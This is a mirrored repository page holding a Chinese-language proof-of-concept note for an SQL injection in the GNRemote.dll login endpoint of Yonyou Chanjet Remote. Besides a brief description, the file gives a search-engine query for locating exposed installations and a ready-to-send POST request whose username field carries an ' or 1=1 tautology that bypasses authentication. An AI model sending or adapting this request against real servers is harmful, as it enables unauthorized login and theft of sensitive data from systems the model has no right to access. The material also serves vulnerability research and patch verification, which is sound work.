admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/用友 畅捷通远程通 GNRemote.dll SQL注入漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

35 lines
709 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞
## 漏洞描述
用友 畅捷通远程通 GNRemote.dll SQL注入漏洞攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备
## 漏洞影响
```
用友 畅捷通远程通
```
## 网络测绘
```
body="远程通CHANJET_Remote"
```
## 漏洞复现
登录页面
![image-20221017171544062](images/202210171715136.png)
验证POC
```
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
```
![image-20221017171557552](images/202210171715601.png)
![image-20221017171609942](images/202210171716987.png)
Reference in New Issue View Git Blame Copy Permalink